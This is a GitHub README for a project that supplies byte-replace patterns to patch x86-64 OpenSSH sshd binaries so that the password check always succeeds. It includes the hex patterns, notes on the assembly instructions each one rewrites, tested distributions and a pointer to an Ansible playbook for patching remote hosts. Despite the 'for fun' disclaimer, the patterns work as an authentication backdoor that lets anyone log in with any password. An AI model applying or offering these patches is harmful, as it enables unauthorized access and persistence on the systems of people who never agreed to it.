ViRb3 / drunk-sshd

🍺 Byte replace patterns to make sshd accept any password as valid

Geek Repo:Geek Repo

Github PK Tool:Github PK Tool

Drunk SSHd

⚠️ This project was an experiment purely for fun and should be treated as such. Do NOT put in production!

Ever wondered what happens if SSHd has a little too much to drink? Well, it starts accepting any password as valid. This repo contains generic byte replace patterns that will patch any x86-64 sshd binary to accept any password as valid.

Notes

Although the patterns are as generic as possible, they are only for x86-64 and may not work on all OpenSSH versions. Tested versions are as follows:

  • Lubuntu 19.10
  • Kali 2019.4
  • Linux Mint 19.3 XFCE

The tested binaries can be found in samples.

Patching

Remote

Check out the provided Ansible playbook.

Local

Use my byte pattern patcher with this patch file and target your sshd binary. You should see three replaced occurances, one for each pattern.

Methodology

The patterns will patch all exit routines in auth-passwd.c's

int auth_password(struct ssh *ssh, const char *password)

to return true, therefore authenticated.

Patterns

  • Patch auth_password exit routine 1
31 ?? 85 ?? 0f 95 ?? 21 ??
31 ?? ?? ?? b8 01 00 00 00

31 [11......] 	// XOR
85 [11......] 	// TEST
0f 95 [11......] 	// SETNZ -> MOV EAX, 0x1
21 [11......] 	// AND -> OVERWRITTEN
  • Patch auth_password exit routine 2
    • 2 variations (check patch file)
21 ?? 0f b6 ?? eb ??
b8 01 00 00 00 ?? ??

21 [11......] 	// AND -> MOV EAX, 0x1
0f b6 [11......] 	// MOVZX -> OVERWRITTEN
eb [........] 	// JMP
  • Patch auth_password exit routine 3
    • 2 variations (check patch file)
85 ?? 0f 95 ?? 83 3d ?? ?? ?? ?? 01 74 ?? 8B ?? ?? ?? ?? ?? 85 ??
85 ?? 0f 95 ?? 83 3d ?? ?? ?? ?? 01 74 ?? 8B ?? ?? ?? ?? ?? 39 ??

85 [11......] 	// TEST
0f 95 [11......] 	// SETNZ
83 3d [........] [........] [........] [........] 01 	// CMP
74 [........] 	// JZ
8b [00...101] [........] [........] [........] [........] 	// MOV
85 [11......] 	// TEST -> CMP

About

🍺 Byte replace patterns to make sshd accept any password as valid